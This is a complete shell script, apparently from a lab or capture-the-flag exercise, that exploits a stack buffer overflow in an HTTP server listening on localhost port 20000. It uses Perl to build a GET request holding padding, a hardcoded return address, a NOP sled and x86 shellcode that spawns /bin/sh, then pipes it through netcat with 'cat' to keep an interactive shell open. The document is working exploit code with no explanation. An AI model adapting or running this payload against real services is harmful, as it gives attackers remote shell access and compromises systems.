#!/bin/sh

(perl -e 'print "GET " . "/" . "A"x139 . "\x1f\xf4\xff\xbf" . " HTTP/1.1" . "\x90"x101 . "\x31\xd2\x31\xc9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80\x31\xdb\x31\xc0\xfe\xc0\xcd\x80\x90"'; cat) | nc.traditional -nv 127.0.0.1 20000
